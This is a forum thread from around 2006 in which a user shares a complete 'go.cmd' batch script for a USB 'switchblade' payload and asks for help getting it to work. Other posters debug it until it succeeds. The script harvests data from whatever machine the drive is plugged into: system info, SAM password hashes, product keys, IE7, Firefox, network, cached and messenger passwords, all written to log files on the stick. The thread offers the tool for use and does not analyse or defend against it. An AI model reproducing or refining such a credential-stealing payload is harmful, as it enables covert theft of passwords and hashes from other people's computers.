confused Posted December 29, 2006 Posted December 29, 2006 I have been trying to modify the go.cmd file to get what i want from machines and i came up with this, and it's not working, any ideas why? Can anybody help me? And I do have a Sandisk 1GB U3 drive. And I also put payload 1.1 on the root of my drive. @echo off if not exist WIPdump md WIPdump >nul if not exist WIPdump%computername% md WIPdump%computername% >nul cd WIPCMD >nul @echo off if not exist Documents md Documents >nul if not exist Documentslogfiles md Documentslogfiles >nul cd wipcmd >nul Echo ************************************ > Documentslogfiles%computername%.log 2>&1 echo ***********[system info]************ >> Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> Documentslogfiles%computername%.log 2>&1 ipconfig /all >> Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 Echo ***********[Dump SAM]*************** >> Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 .pwdump 127.0.0.1 >> Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1 echo ***********[Dump Product Keys]****** >> WIPdump%computername%%computername%.log 2>&1 Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1 .produkey /nosavereg /stext "WIPdump%computername%%computername%_pk.log" /remote %computername% >> WIPdump%computername%%computername%.log 2>&1 copy WIPdump%computername%%computername%.log+WIPdump%computername%%computername%_pk.log* WIPdump%computername%%computername%.log >> nul del /f /q "WIPdump%computername%%computername%_pk.log" >nul Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1 echo ***********[Dump IE7 secrets]******* >> WIPdump%computername%%computername%.log 2>&1 Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1 .iepv.exe /stext "WIPdump%computername%%computername%_ie7.log" >> WIPdump%computername%%computername%.log 2>&1 copy WIPdump%computername%%computername%.log+WIPdump%computername%%computername%_ie7.log* WIPdump%computername%%computername%.log >> nul del /f /q "WIPdump%computername%%computername%_ie7.log" >nul Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1 echo ***********[Dump Network PW]******** >> WIPdump%computername%%computername%.log 2>&1 Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1 .netpass.exe /stext "WIPdump%computername%%computername%_np.log" >> WIPdump%computername%%computername%.log 2>&1 copy WIPdump%computername%%computername%.log+WIPdump%computername%%computername%_np.log* WIPdump%computername%%computername%.log >> nul del /f /q "WIPdump%computername%%computername%_np.log" >nul Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1 echo ************[Dump Cache PW]********* >> WIPdump%computername%%computername%.log 2>&1 Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1 .cachedump.exe >> WIPdump%computername%%computername%.log 2>&1 Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1 echo ***********[Dump messenger PW]******** >> WIPdump%computername%%computername%.log 2>&1 Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1 .mspass.exe /stext "WIPdump%computername%%computername%_ms.log" >> WIPdump%computername%%computername%.log 2>&1 copy WIPdump%computername%%computername%.log+WIPdump%computername%%computername%_ms.log* WIPdump%computername%%computername%.log >> nul del /f /q "WIPdump%computername%%computername%_ms.log" >nul set RtD=%CD% cd /D "%appdata%MozillaFirefoxProfiles" >nul set PROFILE= for /D %%i in (*) do set PROFILE=%%i cd /D %RtD% >nul Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1 Echo *********[Dump Firefox PW]********** >> WIPdump%computername%%computername%.log 2>&1 Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1 .FirePassword.exe "%appdata%MozillaFirefoxProfiles%PROFILE%" >> WIPdump%computername%%computername%.log :End exit Quote
Forgotten Posted December 29, 2006 Posted December 29, 2006 If you would be so kind as to explain what parts are not working? We need to know in order to help you successfully. And just a quick FYI, you do not need to declare "@echo off" a second time. Quote
confused Posted December 29, 2006 Author Posted December 29, 2006 OK, i took the second echo off out, and now i get the system info and then it says "dump sam" and it's it. I don't know much C language, mostly HTML and python, so i'm having a little trouble with this. THanks for your help Quote
confused Posted December 29, 2006 Author Posted December 29, 2006 Could somebody possibly give me step by step instructions about what payload(s) to get and what to put the following switchblade packages go.cmd System Info Product Key Internet Explorer Password Grabber Network Password Dumper Cachedump Messenger password Dumper I am slightly confused about how to arrange these in the go.cmd file. Because I only seem to get the system info and that's all. Quote
Forgotten Posted December 29, 2006 Posted December 29, 2006 A useful wiki page for custimizing your own go.cmd is here: http://hak5.org/wiki/Switchblade_Packages Maybe that will help you. Quote
confused Posted December 29, 2006 Author Posted December 29, 2006 THat's where I got the code the first time for the go.cmd. How do i link them together? Do I need a blank line inbetween or does one just flow into the next? With the payload 1.1 all i can get is the system info, and i noticed in the WIPCMD where the go.cmd file is there are the programs that the code is for in the go.cmd file. DO I need the code and the individual programs? IS there a certain order? ~Thanks for all your help.~ Quote
Forgotten Posted December 31, 2006 Posted December 31, 2006 THat's where I got the code the first time for the go.cmd. How do i link them together? Do I need a blank line inbetween or does one just flow into the next? With the payload 1.1 all i can get is the system info, and i noticed in the WIPCMD where the go.cmd file is there are the programs that the code is for in the go.cmd file. DO I need the code and the individual programs? IS there a certain order? ~Thanks for all your help.~ You can add them any way you want, the go.cmd doesn't care if you have them right next to each other or 50 lines down.. No particular order. All files you download go in the /WIP/CMD Quote
confused Posted December 31, 2006 Author Posted December 31, 2006 IT works now! THank-you, oh and if i just see *********************************** ***********[Dump IE7 secrets]******** *********************************** in the log file does that mean that there were no passwords or info in the ie explorer ? Quote
remkow Posted January 1, 2007 Posted January 1, 2007 If there is nothing after it, either there was an error in the program, or there was indeed no info/passes available Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.